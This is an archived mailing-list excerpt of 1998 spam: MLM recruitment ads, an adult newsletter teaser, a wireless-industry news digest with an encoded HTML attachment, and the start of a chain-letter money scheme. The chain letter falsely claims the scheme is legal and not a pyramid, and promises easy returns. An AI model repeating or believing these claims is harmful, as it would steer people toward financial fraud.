plus a $50 bonus when the people you sign up or they sign up cycle

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

MultilevelSalesAssociaton downline club. We will enter 500 people

into 3 diverse mlm programs that will earn you $$$$$$$$$$$

This club is free to join and will allow you to enter programs 

with 200-400 people already in your downline 

reply to this message with dlc in your subject line

or go to http://www.thebestincellular.net/dlc.html

or Call! 1-800-600-0343 ext# 2107

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

There are over 40 million people in the US without medical coverage

Now HEALTCARE HAS GONE MLM. You can make $$$$$$$ signing up people 

into this 14 year old program. The basic plan costs 

$29.95 per month per family, everyone is covered, it provides

benefits like accidental insurance, discounts at doctors, hospitals,

dentists, vision care specialists, RX stores and much more, over

300,000 providers of service for more info reply to this message with napp

in the subject line or go to <http://www.thebestincellular.net/napp.html>

Call us! 1-800-600-0343 ext 2107








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Mon, 21 Sep 1998 11:13:55 -0700 (PDT)
To: (STUFFED MONDAY SEPTEMBER 21 1998)
Subject: 'I F**K LUCY' ON THE WEB/NET SEX HITS THE STOCK MARKET
Message-ID: <19980921071001.17302.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


IN TODAY'S ISSUE:

 30 NEW EXTRA HOT JPEGS!
  5 NEW SIZZLING STORIES
   NOOKIE IN THE NEST
    ROAD ROMPS
     CAPITAL HILL HORNINESS
      AUCTION SITE RESTRICTED TO ADULTS
       SWISS SEX SEEKER ARRESTED
        I F**K LUCY
         NET SEX AND STOCKS
          THE BEST OF EUREKA!
           MUCH MORE!

       ---->   http://stuffed.net/98/9/21/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/21/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 21 Sep 1998 10:22:34 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 21, 1998
Message-ID: <199809211716.MAA20127@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713805.multipart/mixed"

--Boundary..3996.1071713805.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

The Newest Most Comprehensive Tradeshow of Wireless
Computing and Communications is Less Than a Month Away.
Register TODAY!
http://www.wirelessit.com/register.htm 

Team WOW-COM
wowcom@ctia.org
===========================================
 




--Boundary..3996.1071713805.multipart/mixed
Content-Type: application/octet-stream; name="bin00021.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00021.bin"
Content-Description: "_CTIA_Daily_News_19980921.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8QlI+Jm5ic3A7CjxDRU5URVI+PFRB
QkxFIEJPUkRFUj0wIENPTFM9MiBXSURUSD0iNjAwIiA+CjxUUj4KPFREPjxB
IEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPjxJTUcgU1JDPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9ob21laGVkX3Rlc3QuZ2lmIiBB
TFQ9IldPVy1DT00uQ09NIiBOT1NBVkUgQk9SREVSPTAgSEVJR0hUPTg5IFdJ
RFRIPTI3NT48L0E+PC9URD4KCjxURD4KPENFTlRFUj48QSBIUkVGPSJodHRw
Oi8vd3d3LmlsbHVtaW5ldFNTNy5jb20vd2lyZWxlc3Mvd2ludW1wb3IuaHRt
Ij48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFnZXMvYWRz
L2lsbHVtaW5ldF9udW1wb3J0LmdpZiIgQUxUPSJUb2RheSdzIE5ld3MgU3Bv
bnNvcmVkIGJ5IElsbHVtaW5ldCIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD03
NSBXSURUSD0xNzUgQUxJR049QUJTQk9UVE9NPjwvQT48L0NFTlRFUj4KPC9U
RD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9D
RU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9MCBXSURUSD0iNjAwIiA+
CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0ND
QyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09N
IC0gU2VwdGVtYmVyIDIxLCAxOTk4PC9GT05UPjwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5Gb3JtZXIgUHJlc2lkZW50IEdlb3JnZQpCdXNo
IHRvIGJlIFNwZWNpYWwgSG9ub3JlZCBHdWVzdCBhdCBDVElBknMgV0lSRUxF
U1Mgkjk5IGluIE5ldyBPcmxlYW5zCkZlYi4gOC0xMCwgMTk5OTwvRk9OVD48
L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BIGhpZ2hs
aWdodCBvZiBXSVJFTEVTUyCSOTksIHRoZSBuYXRpb26ScwpsYXJnZXN0IGFu
ZCBtb3N0IGNvbXBsZXRlIHdpcmVsZXNzIHRlbGVjb21tdW5pY2F0aW9ucyBj
b252ZW50aW9uIGFuZCBleHBvLAp3aWxsIGJlIJNBIENvbnZlcnNhdGlvbiBX
aXRoIEdlb3JnZSBCdXNoLpQmbmJzcDsgVGhlIGZvcm1lciBVLlMuIFByZXNp
ZGVudJJzCmFwcGVhcmFuY2Ugd2lsbCBiZSBhdCA5IGEubS4gb24gV2VkLiwg
RmViLiAxMCwgMTk5OS4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly93d3cud293
LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4
LmNmbT9hcnRpY2xlaWQ9MzQzMCI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlFV
QUxDT01NJ3MgcGRRIFNtYXJ0ClBob25lIERlbW9uc3RyYXRlZCBMYXN0IFdl
ZWs8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+UVVBTENPTU0ncyBsYXRlc3QgY3JlYXRpb24gaXMgYSBkaWdpdGFsCndp
cmVsZXNzIHBob25lIHRoYXQgaXMgZnVsbHkgaW50ZWdyYXRlZCB3aXRoIGEg
UGFsbSBQaWxvdCBoYW5kLWhlbGQgY29tcHV0ZXIuJm5ic3A7Cig8QSBIUkVG
PSJodHRwOi8vd3d3Lm55dGltZXMuY29tL2xpYnJhcnkvdGVjaC85OC8wOS9i
aXp0ZWNoL2FydGljbGVzLzIxY29tcC5odG1sIj5OWVRJTUVTPC9BPik8L0ZP
TlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9KzE+UHJlcGFpZCBXaXJlbGVzcyBJcyBCZWNvbWluZwpUaGUgTGF0ZXN0
IFRyZW5kIGluIFRlbGVjb21tdW5pY2F0aW9uczwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BcHByb3hpbWF0ZWx5IGZp
ZnR5IHBlcmNlbnQgb3IgbW9yZSBvZgpuZXcgYnVzaW5lc3MgZm9yIG1hbnkg
Y2FycmllcnMgaXMgY29taW5nIGZyb20gcHJlcGFpZCB3aXJlbGVzcyBzYWxl
cy4mbmJzcDsKKDxBIEhSRUY9Imh0dHA6Ly93d3cudXNhdG9kYXkuY29tL2xp
ZmUvY3liZXIvdGVjaC9jdGQ1MDIuaHRtIj5VU0FUT0RBWTwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPldJUkVMRVNTIEkuVC4gQ29udmVudGlvbgphbmQgRXhwbzogVGhlIEJ1
enogT2N0LiAxMi0xNCwgMTk5OCBhdCBCYWxseZJzIExhcyBWZWdhczwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5DVElB
LCB0aGUgQ2VsbHVsYXIgVGVsZWNvbW11bmljYXRpb25zCkluZHVzdHJ5IEFz
c29jaWF0aW9uLCBob3N0cyBXSVJFTEVTUyBJLlQuIENvbnZlbnRpb24gYW5k
IEV4cG8gT2N0LiAxMi0xNCwKMTk5OCBhdCBCYWxseSdzIExhcyBWZWdhcy4g
UmVwb3J0ZXJzIGFuZCBlZGl0b3JzIG1heSBub3cgcHJlLXJlZ2lzdGVyIGZv
cgp0aGUgc2hvdy4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
cmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4LmNmbT9hcnRp
Y2xlaWQ9MzQyOSI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkxlYWQgaW4gVHJh
bnNmZXJyaW5nCmZyb20gV2lyZWxpbmUgdG8gV2lyZWxlc3MgQ29tbXVuaWNh
dGlvbnMgaXMgT3ZlcnNlYXM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+QWR2YW5jZW1lbnQgb2Ygd2lyZWxlc3MgdGVj
aG5vbG9naWVzIGluCmludGVybmF0aW9uYWwgY291bnRyaWVzIGlzIGdyZWF0
ZXIgdGhhbiBpbiB0aGUgVW5pdGVkIFN0YXRlcy4mbmJzcDsgQWxtb3N0CmZp
ZnR5IHBlcmNlbnQgb2YgcGhvbmUgdXNlcnMgaW4gRmlubGFuZCB1c2Ugd2ly
ZWxlc3MgcGhvbmVzLiAoPEEgSFJFRj0iaHR0cDovL2ludGVyYWN0aXZlLndz
ai5jb20vYXJ0aWNsZXMvU0I5MDU3ODc5ODE3NTM3NTAwMDAuaHRtIj5XU0o8
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
PEZPTlQgU0laRT0rMT5EZXNwaXRlIFRoZSBJbmNyZWFzZQppbiBVc2UgYW5k
IEF2YWlsYWJpbGl0eSwgQ2VsbCBQaG9uZXMgSGF2ZSBOb3QgUmVhY2hlZCBN
YWluc3RyZWFtIFVzZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5TZXZlcmFsIGZhY3RvcnMgc3VjaCBhcyBmaW5hbmNp
YWwsIHRlY2hub2xvZ2ljYWwKb3Igc29jaWFsLCBvciBhIGNvbWJpbmF0aW9u
IG9mIGFsbCB0aHJlZSwgImRldGVyIiB0aGUgdXNlIG9mIGNlbGwgcGhvbmVz
LiZuYnNwOwooPEEgSFJFRj0iaHR0cDovL2ludGVyYWN0aXZlLndzai5jb20v
YXJ0aWNsZXMvU0I5MDU3ODgxODExMzgwNjAwMC5odG0iPldTSjwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPkN1dHRpbmcgVGhlIFBob25lIENvcmQ8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+V2FsbCBTdHJlZXQgSm91
cm5hbCByZXBvcnRlciBjdXRzIGhlcgpwaG9uZSBjb3JkIHRvIGxpdmUgYW5k
IHdvcmsgZXhjbHVzaXZlbHkgd2l0aCBhIGNlbGx1bGFyIHBob25lIGFuZCBk
aXNjb3ZlcnMKdGhlIGZyZWVkb20gb2YgdGhlIHdpcmVsZXNzIGluZHVzdHJ5
LiZuYnNwOyAoPEEgSFJFRj0iaHR0cDovL2ludGVyYWN0aXZlLndzai5jb20v
YXJ0aWNsZXMvU0I5MDU3ODg2MzA3MTY4MDUwMDAuaHRtIj5XU0o8L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5BIE5ldyBBaXJsaW5lIEZvciBXaXJlbGVzcwpDb21tdW5pY2F0
aW9uczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj5BbmdlbCBUZWNobm9sb2dpZXMgcGxhbnMgdG8gdXNlIGFpcnBsYW5l
cwp0byBkZWxpdmVyIHdpcmVsZXNzIHNlcnZpY2UgYXMgYW4gYWx0ZXJuYXRp
dmUgdG8gc2F0ZWxsaXRlcyBvciBsYW5kLWJhc2VkCndpcmVsZXNzIHN5c3Rl
bXMuJm5ic3A7ICg8QSBIUkVGPSJodHRwOi8vd3d3Lndhc2hpbmd0b25wb3N0
LmNvbS93cC1zcnYvV1BsYXRlLzE5OTgtMDkvMjEvMDI4bC0wOTIxOTgtaWR4
Lmh0bWwiPldBU0hQT1NUPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RkNDIERlbGF5cyBDQUxF
QSBEZWFkbGluZQp0byBKdW5lIDIwMDA8L0ZPTlQ+PC9GT05UPjwvQj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+V2l0aCB0aGUgZGVsYXkgZ3JhbnRl
ZCBieSB0aGUgRkNDLCB0aGUKRkJJIGNhbm5vdCByZXF1aXJlIHRlbGVjb20g
Y29tcGFuaWVzIHRvIHByb3ZpZGUgdGhlIGhvbWluZyBmdW5jdGlvbiB3aXRo
b3V0CmZ1cnRoZXIgY29uc2lkZXJhdGlvbiBieSB0aGUgY29tbWlzc2lvbi4m
bmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly93d3cud2FzaGluZ3RvbnBvc3QuY29t
L3dwLXNydi9XUGxhdGUvMTk5OC0wOS8yMS8wMzFsLTA5MjE5OC1pZHguaHRt
bCI+V0FTSFBPU1Q8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5MYXd5ZXJzIE9wcG9zZSBQcm9w
b3NlZApZZWFyIDIwMDAgQ29tcHJvbWlzZSBCaWxsPC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk9wcG9uZW50cyBvZiBZ
MksgQ29tcHJvbWlzZSBCaWxsIGFyZSBjb25jZXJuZWQKb3ZlciB0aGUgcmVz
cG9uc2liaWxpdGllcyBjb21wdXRlciBhbmQgY2hpcCBtYWtlcnMgd291bGQg
cmVjZWl2ZSBpbW11bml0eQpmcm9tIGluIGZ1dHVyZSBsaWFiaWxpdHkgc3Vp
dHMuJm5ic3A7Jm5ic3A7ICg8QSBIUkVGPSJodHRwOi8vd3d3Lm55dGltZXMu
Y29tL2xpYnJhcnkvdGVjaC85OC8wOS9iaXp0ZWNoL2FydGljbGVzLzIxeWVh
ci5odG1sIj5OWVRJTUVTPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+Tm9ydGggQW1lcmljYW4g
R1NNIEFsbGlhbmNlCiZhbXA7IEludGVyRGlnaXRhbCBDb21tdW5pY2F0aW9u
cyBDb3Jwb3JhdGlvbiBFbmRvcnNlIEFncmVlbWVudCB0byBNZXJnZQpXLUNE
TUEvTkEgYW5kIFdJTVMgVy1DRE1BIFRoaXJkIEdlbmVyYXRpb24gV2lyZWxl
c3MgUHJvcG9zYWxzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPlRoZSBOb3J0aCBBbWVyaWNhbiBHU00gQWxsaWFuY2Ug
TExDIGFuZApJbnRlckRpZ2l0YWwgQ29tbXVuaWNhdGlvbnMgQ29ycG9yYXRp
b24gKEFTRTpJREMpIHRvZGF5IGFubm91bmNlZCB0aGF0CnRoZXkgZW5kb3Jz
ZSB0aGUgZGVjaXNpb24gdG8gbWVyZ2UgdHdvIG9mIHRoZSBVLlMuIFJhZGlv
IFRyYW5zbWlzc2lvbiBUZWNobm9sb2d5CihSVFQpIHByb3Bvc2FscyBzdWJt
aXR0ZWQgdG8gdGhlIEludGVybmF0aW9uYWwgVGVsZWNvbW11bmljYXRpb25z
IFVuaW9uCihJVFUpIGFzIGNhbmRpZGF0ZXMgZm9yIFRoaXJkIEdlbmVyYXRp
b24gd2lyZWxlc3Mgc3RhbmRhcmRzLiZuYnNwOyAoPEEgSFJFRj0iaHR0cDov
L3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25hbC9uZXdzL2Zy
YW1laW5kZXguY2ZtP2FydGljbGVpZD0zNDI4Ij5XT1ctQ09NPC9BPik8L0ZP
TlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9KzE+U3RvcnkgQmVoaW5kIEZhaWxlZCBNZXJnZXIKQmV0d2VlbiBDaWVu
YSBhbmQgVGVsbGFicyBDb250aW51ZXM8L0ZPTlQ+PC9GT05UPjwvQj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QWNjdXNhdGlvbnMgb2Ygc2Fib3Rh
Z2UsIHRoZSBzdG9jayBtYXJrZXQKcGx1bmdlIGFuZCBvdGhlciBmYWN0b3Jz
IGFyZSBibGFtZWQgZm9yIHRoZSBmYWlsZWQgbWVyZ2VyLiZuYnNwOyAoPEEg
SFJFRj0iaHR0cDovL3d3dy5ueXRpbWVzLmNvbS9saWJyYXJ5L3RlY2gvOTgv
MDkvYml6dGVjaC9hcnRpY2xlcy8yMWJ1c3QuaHRtbCI+TllUSU1FUzwvQT4p
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Rm9yIGFkZGl0aW9uYWwgbmV3cyBh
Ym91dAp0aGUgd2lyZWxlc3MgaW5kdXN0cnktLWluY2x1ZGluZyBwZXJpb2Rp
YyBuZXdzIHVwZGF0ZXMgdGhyb3VnaG91dCB0aGUgZGF5LS12aXNpdAo8QSBI
UkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tIj5odHRwOi8vd3d3Lndvdy1j
b20uY29tLjwvQT48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Q1RJQSBE
YWlseSBOZXdzIGZyb20gV09XLUNPTQppcyB0cmFuc21pdHRlZCB3ZWVrZGF5
cywgZXhjZXB0IGZvciBob2xpZGF5cy4gVmlzaXQgdXMgb24gdGhlIFdvcmxk
IFdpZGUKV2ViIGF0IDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
cHJvZmVzc2lvbmFsIj5odHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Np
b25hbDwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5JZiB5b3Ug
YXJlIG5vdCBpbnRlcmVzdGVkCmluIHJlY2VpdmluZyB0aGUgQ1RJQSBEYWls
eSBOZXdzIGZyb20gV09XLUNPTSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdlIHRv
CjxBIEhSRUY9Im1haWx0bzp1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51
bml0eW1haWwuY29tIj51bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0
eW1haWwuY29tPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+
PEI+KioqPEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PS0xPiBUaGUgdGVybSAidW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5p
dHltYWlsLmNvbSIKbXVzdCBiZSBsaXN0ZWQgaW4gdGhlIFRPIHNlY3Rpb24g
b2YgdGhlIGVtYWlsLjwvRk9OVD48L0ZPTlQ+ICoqKjwvQj4mbmJzcDsKCjxQ
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5Q
bGVhc2UgTm90ZTogU29tZSBvZiB0aGUKbGlua3MgaW4gdG9kYXkncyBuZXdz
IGFyZSB0aW1lIHNlbnNpdGl2ZS4mbmJzcDsgVGhvc2UgbGlua3MgbWF5IG5v
dCBiZQphdmFpbGFibGUgYXMgbmV3cyBjaGFuZ2VzIHRocm91Z2hvdXQgdGhl
IGRheS4mbmJzcDsgQWxzbywgc29tZSBuZXdzIHNvdXJjZXMKbWF5IGJlIHN1
YnNjcmlwdGlvbi1iYXNlZCBvciByZXF1aXJlIHJlZ2lzdHJhdGlvbi48L0ZP
TlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8
L1RSPgo8L1RBQkxFPjwvQ0VOVEVSPgoKPENFTlRFUj4mbmJzcDs8L0NFTlRF
Uj4KCjwvQk9EWT4KPC9IVE1MPgo=
--Boundary..3996.1071713805.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: billxxxjbt@itt.net
Date: Mon, 21 Sep 1998 23:00:51 -0700 (PDT)
To: success@carolina.net
Subject: IN The News
Message-ID: <199702170025.GAA08056@carolina.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Frend,

If you received this message in error, please accept my apologies.
This is the letter you've been reading about in the news lately.  Due to the popularity of this letter on the internet, a major nightly news program recently devoted an entire show to the  investigation of the program described below  to see if it really can make people money.  If you saw it, you know that their conclusion was that, while most people did not make the $50,000 discussed in the plan, most people were able to double and triple their money at the very least, in a short amount of time.
The show also investigated whether or not the program was legal.  Their findings proved once and for all that there are absolutely no laws prohibiting the participation in the program.  This has helped to show people that this is a simple, harmless and fun way to make some extra money at home.  This is for real.
The result of this show has been truly remarkable.  So many people are participating that those involved are doing much better than ever before.  Since everyone makes more as more people try it out, its been very exciting to be a part of lately.  You will understand once you experience it.
You may have thought this is a chain letter or a pyramid scheme (it's not).  You may have thought this is illegal  (it's not).  You may have just decided its not worth your time  (it is).   Whatever the reason you decided not to try it in the past, I ask you to reconsider.
After reading the simple instructions below, you will be ready to start.   I think that once you begin to see your first orders in the mail, you will be surprised to learn just how many people are participating in this program.   I have been involved in the program for a long time but I have never seen so many people trying this out as I have recently.   This is good news because the more people that do it, the more everyone benefits.  If you ever thought of giving this a shot, now's the time to do it.
